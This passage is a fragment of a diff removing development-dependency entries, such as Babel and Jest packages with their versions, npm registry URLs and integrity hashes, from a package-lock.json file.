}, - "@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true - }, - "@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "requires": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - } - }, - "@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "requires": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - } - }, - "@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3" - } - }, - "@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - } - }, - "@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": 